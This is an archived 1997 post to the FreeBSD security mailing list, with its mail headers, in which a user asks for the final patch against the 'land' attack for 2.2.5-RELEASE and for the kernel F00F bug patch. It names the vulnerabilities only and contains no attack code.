(envelope-from jkowall@coffeehaus.net) Received: (qmail 549 invoked from network); 20 Dec 1997 00:14:32 -0000 Received: from freebsd.coffeehaus.net (jkowall@146.115.119.6) by freebsd.coffeehaus.net with SMTP; 20 Dec 1997 00:14:32 -0000 Date: Fri, 19 Dec 1997 19:14:32 -0500 (EST) From: Jonah Kowall To: freebsd-security@freebsd.org Subject: land.c patch for 2.2.5-RELEASE Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Does anyone have the "final" patch released, as well as the final F00F patch for the kernel. Sorry to bother you busy bees, but I am in desperate need of the land patch asap. thanks guys for all the interesting dicussions I am able to enjoy! - Jonah Kowall VP Technology Coffeehaus Networks / Content Advisor Somerville, MA